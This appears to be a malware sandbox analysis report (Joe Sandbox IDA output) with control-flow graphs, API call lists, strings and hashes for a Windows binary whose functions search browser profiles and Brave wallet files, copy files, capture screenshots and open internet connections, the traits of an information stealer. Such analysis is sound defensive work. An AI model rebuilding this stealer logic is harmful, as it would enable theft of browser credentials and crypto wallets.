                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1475 40c6cd-40c77f _EH_prolog call 40f96a call 40fa6f call 40fae3 call 40fa28 call 40f9d5 * 2 call 40f96a * 2 call 40fb94 FindFirstFileA 1494 40c781-40c7c1 call 40f9d5 * 3 call 401061 call 40f9d5 1475->1494 1495 40c7c6-40c7cc 1475->1495 1526 40d428-40d44d call 40f9d5 * 2 1494->1526 1496 40c7ce-40c7e2 StrCmpCA 1495->1496 1498 40d3c8-40d3da FindNextFileA 1496->1498 1499 40c7e8-40c7fc StrCmpCA 1496->1499 1498->1496 1502 40d3e0-40d3f0 FindClose call 40f9d5 1498->1502 1499->1498 1503 40c802-40c88e call 40f9de call 40fa6f call 40fae3 * 2 call 40fa28 call 40f9d5 * 3 1499->1503 1508 40d3f5-40d425 call 40f9d5 * 2 call 401061 call 40f9d5 1502->1508 1542 40c9f3-40ca88 call 40fae3 * 4 call 40fa28 call 40f9d5 * 3 1503->1542 1543 40c894-40c8ad call 40fb94 StrCmpCA 1503->1543 1508->1526 1590 40ca8e-40cab0 call 40f9d5 call 40fb94 StrCmpCA 1542->1590 1549 40c953-40c9ee call 40fae3 * 4 call 40fa28 call 40f9d5 * 3 1543->1549 1550 40c8b3-40c94e call 40fae3 * 4 call 40fa28 call 40f9d5 * 3 1543->1550 1549->1590 1550->1590 1601 40cab6-40caca StrCmpCA 1590->1601 1602 40cccf-40cce4 StrCmpCA 1590->1602 1601->1602 1603 40cad0-40cc49 call 40f96a call 410b42 call 40fae3 call 40fa6f call 40fae3 call 40fa6f call 40fa28 call 40f9d5 * 5 call 40fb94 * 2 call 40f96a call 40fae3 * 2 call 40fa28 call 40f9d5 * 2 call 40f9a1 call 4061de 1601->1603 1604 40cce6-40cd49 call 4010b1 call 40f9a1 * 3 call 40c2cf 1602->1604 1605 40cd59-40cd6e StrCmpCA 1602->1605 1812 40cc98-40ccca call 40fb94 call 40fb5b call 40fb94 call 40f9d5 * 2 1603->1812 1813 40cc4b-40cc93 call 40f9a1 call 4010b1 call 414519 call 40f9d5 1603->1813 1661 40cd4e-40cd54 1604->1661 1606 40cd70-40cd87 call 40fb94 StrCmpCA 1605->1606 1607 40cdea-40ce05 call 40f9a1 call 410cc3 1605->1607 1620 40d337-40d33e 1606->1620 1621 40cd8d-40cd90 1606->1621 1632 40ce8b-40cea0 StrCmpCA 1607->1632 1633 40ce0b-40ce0e 1607->1633 1624 40d340-40d3ad call 40f9a1 * 2 call 40f96a call 4010b1 call 40c6cd 1620->1624 1625 40d3b8-40d3c3 call 40fb5b * 2 1620->1625 1621->1620 1627 40cd96-40cde8 call 4010b1 call 40f9a1 * 2 1621->1627 1689 40d3b2 1624->1689 1625->1498 1673 40ce69-40ce7b call 40f9a1 call 40678a 1627->1673 1638 40d124-40d139 StrCmpCA 1632->1638 1639 40cea6-40cf97 call 40f96a call 410b42 call 40fae3 call 40fa6f call 40fae3 call 40fa6f call 40fa28 call 40f9d5 * 5 call 40fb94 * 2 CopyFileA 1632->1639 1633->1620 1641 40ce14-40ce66 call 4010b1 call 40f9a1 call 40f96a 1633->1641 1638->1620 1650 40d13f-40d230 call 40f96a call 410b42 call 40fae3 call 40fa6f call 40fae3 call 40fa6f call 40fa28 call 40f9d5 * 5 call 40fb94 * 2 CopyFileA 1638->1650 1754 40d07b-40d094 call 40fb94 StrCmpCA 1639->1754 1755 40cf9d-40d075 call 4010b1 call 40f9a1 * 3 call 406e7d call 4010b1 call 40f9a1 * 3 call 4078e6 1639->1755 1641->1673 1760 40d314-40d326 call 40fb94 DeleteFileA call 40fb5b 1650->1760 1761 40d236-40d29a call 4010b1 call 40f9a1 * 3 call 407219 1650->1761 1661->1620 1695 40ce80-40ce86 1673->1695 1689->1625 1695->1620 1770 40d105-40d117 call 40fb94 DeleteFileA call 40fb5b 1754->1770 1771 40d096-40d0ff call 4010b1 call 40f9a1 * 3 call 407f1a 1754->1771 1755->1754 1781 40d32b 1760->1781 1811 40d29f-40d30e call 4010b1 call 40f9a1 * 3 call 407535 1761->1811 1795 40d11c-40d11f 1770->1795 1771->1770 1787 40d32e-40d332 call 40f9d5 1781->1787 1787->1620 1795->1787 1811->1760 1812->1602 1813->1812
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040C6D2
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00425BD3,00425BD2,00000000,?,00425D1C,?,?,00425BCF,?,?,00000000), ref: 0040C773
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425D20,?,?,00000000), ref: 0040C7DA
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00425D24,?,?,00000000), ref: 0040C7F4
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00425D28,?,?,00425BD6,?,?,00000000), ref: 0040C8A5
                                                                                                                                                                                                                                                                    • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                                  • String ID: Brave$Google Chrome$H$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                                                                                                                  • API String ID: 3869166975-1816240570
                                                                                                                                                                                                                                                                  • Opcode ID: e6df1d8c948e2fb47b2843ad313658021b33049d24bc1a947481d0bd2bdec6e7
                                                                                                                                                                                                                                                                  • Instruction ID: a7783fcb89df4de820dea03b0ce90770f802f8f732540dfdba301185ecce5b25
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6df1d8c948e2fb47b2843ad313658021b33049d24bc1a947481d0bd2bdec6e7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5826E70904288EADF25EBA5D956BDDBBB46F15308F1040BEE449732C2DB781B4CCB66
                                                                                                                                                                                                                                                                  Function 004154FA Relevance: 44.1, APIs: 21, Strings: 4, Instructions: 316stringfileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1853 4154fa-41556d _EH_prolog call 418320 wsprintfA FindFirstFileA memset * 2 1856 415573-415587 StrCmpCA 1853->1856 1857 41591f-415939 call 401061 1853->1857 1859 41558d-4155a1 StrCmpCA 1856->1859 1860 4158fe-415910 FindNextFileA 1856->1860 1859->1860 1863 4155a7-4155e3 wsprintfA StrCmpCA 1859->1863 1860->1856 1861 415916-415919 FindClose 1860->1861 1861->1857 1864 4155e5-4155fd wsprintfA 1863->1864 1865 4155ff-41560e wsprintfA 1863->1865 1866 415611-415642 memset lstrcat 1864->1866 1865->1866 1867 415665-41566f strtok_s 1866->1867 1868 415671-4156a5 memset lstrcat 1867->1868 1869 415644-415655 1867->1869 1870 4157e5-4157ef strtok_s 1868->1870 1874 415889-41588f 1869->1874 1875 41565b-415664 1869->1875 1872 4157f5 1870->1872 1873 4156aa-4156ba PathMatchSpecA 1870->1873 1872->1874 1876 4156c0-4157bf call 40f96a call 410b42 call 40fae3 call 40fa6f call 40fae3 call 40fa6f call 40fa28 call 40f9d5 * 5 call 40fb94 * 3 call 410ef8 call 4184c0 1873->1876 1877 4157db-4157e4 1873->1877 1874->1860 1878 415891-41589d 1874->1878 1875->1867 1921 4157c1-4157d6 call 40fb94 call 40f9d5 1876->1921 1922 4157fa-415809 1876->1922 1877->1870 1878->1861 1880 41589f-4158a7 1878->1880 1880->1860 1882 4158a9-4158f3 call 4010b1 call 4154fa 1880->1882 1890 4158f8 1882->1890 1890->1860 1921->1877 1924 41593a-415945 call 40f9d5 1922->1924 1925 41580f-415832 call 40f9a1 call 4061de 1922->1925 1924->1857 1935 415834-415879 call 40f96a call 4010b1 call 414519 call 40f9d5 1925->1935 1936 41587e-415884 call 40f9d5 1925->1936 1935->1936 1936->1874
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004154FF
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00415525
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0041553C
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00415553
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00415561
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042684C), ref: 0041557F
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426850), ref: 00415599
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004155BD
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042655E), ref: 004155CE
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004155F4
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00415608
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041561A
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 0041562C
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00415665
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041567A
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 0041568F
                                                                                                                                                                                                                                                                  • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004156B2
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: _EH_prolog.MSVCRT ref: 00410B47
                                                                                                                                                                                                                                                                    • Part of subcall function 00410B42: GetSystemTime.KERNEL32(?,00426488,00000001,000000C8,00000000,004265AA), ref: 00410B87
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004157B4
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 004157E5
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNELBASE(000000FF,?), ref: 00415908
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 00415919
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrcatlstrcpymemsetwsprintf$Find$Filestrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                                                                                  • API String ID: 264515753-332874205
                                                                                                                                                                                                                                                                  • Opcode ID: 7985fb511fa2e463f3adddbab3e8f11cc3b70e35e4588eae0086117d87b8b892
                                                                                                                                                                                                                                                                  • Instruction ID: fb7acb2c5140ba4d505ebf3fd03b2dde52ac825db6e456b4197f015c4d1fc73c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7985fb511fa2e463f3adddbab3e8f11cc3b70e35e4588eae0086117d87b8b892
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AC170B190025DEEDF21EBA5DC45EEE777DAF05304F10406AF509A2192EB389A888B65
                                                                                                                                                                                                                                                                  Function 004163B3 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227stringfileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004163B8
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004163D8
                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 004163EF
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00426908), ref: 0041640C
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042690C), ref: 00416426
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0041644A
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042656D), ref: 0041645B
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00416478
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0041648C
                                                                                                                                                                                                                                                                  • PathMatchSpecA.SHLWAPI(?,?), ref: 0041649F
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 004164CB
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00426924), ref: 004164DD
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 004164ED
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00426928), ref: 004164FF
                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00416513
                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 004166AE
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004166BD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Filelstrcat$H_prologwsprintf$Find$CloseCreatelstrcpy$AllocFirstHandleLocalMatchNextObjectPathReadSingleSizeSpecThreadWait
                                                                                                                                                                                                                                                                  • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                                                  • API String ID: 3254224521-445461498
                                                                                                                                                                                                                                                                  • Opcode ID: 4e9938e998b73a85b821d4e83cd833d56f6044f6d49dddcb5d697cbb1bb76f04
                                                                                                                                                                                                                                                                  • Instruction ID: ae3aac419e4feb8f70a5f0809fcdbd8a7894f175f88d981b630ca9ba2495d9db
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e9938e998b73a85b821d4e83cd833d56f6044f6d49dddcb5d697cbb1bb76f04
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D917171900259ABDF10EBA4DD45FDE7BBCAF15304F14406AF505B3191EB389B88CBA5
                                                                                                                                                                                                                                                                  Function 004112E3 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004112E8
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041130E
                                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00411344
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00411351
                                                                                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00411358
                                                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00411362
                                                                                                                                                                                                                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00411373
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041137E
                                                                                                                                                                                                                                                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041139A
                                                                                                                                                                                                                                                                  • GlobalFix.KERNEL32(?), ref: 004113F8
                                                                                                                                                                                                                                                                  • GlobalSize.KERNEL32(?), ref: 00411404
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004043D6: _EH_prolog.MSVCRT ref: 004043DB
                                                                                                                                                                                                                                                                    • Part of subcall function 004043D6: lstrlenA.KERNEL32(00000000), ref: 0040444A
                                                                                                                                                                                                                                                                    • Part of subcall function 004043D6: StrCmpCA.SHLWAPI(?,004259DF,004259DB,004259D3,004259CF,004259CE), ref: 004044CD
                                                                                                                                                                                                                                                                    • Part of subcall function 004043D6: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044ED
                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0041147E
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00411499
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004114A0
                                                                                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 004114AA
                                                                                                                                                                                                                                                                  • CloseWindow.USER32(00000000), ref: 004114B1
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
                                                                                                                                                                                                                                                                  • String ID: image/jpeg
                                                                                                                                                                                                                                                                  • API String ID: 3067874393-3785015651
                                                                                                                                                                                                                                                                  • Opcode ID: 098dca24ac1c704120053e300ba56070cce11746ff4e877c37d3a96dd69f5138
                                                                                                                                                                                                                                                                  • Instruction ID: 202ebc8fd6ca9c0a3b5a46c43febb62c2f3527b6b211c57c8ccab21a31e2eca3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 098dca24ac1c704120053e300ba56070cce11746ff4e877c37d3a96dd69f5138
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90513CB6900218AFDF01DFE5DD499EEBF79FF0A714F10402AFA01E2160D7394A498B65
                                                                                                                                                                                                                                                                  Function 004041DB Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 170networkmemoryfileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004041E0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: _EH_prolog.MSVCRT ref: 00403A82
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB4
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABD
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AC6
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AE0
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AF0
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404227
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040422E
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040424D
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00404261
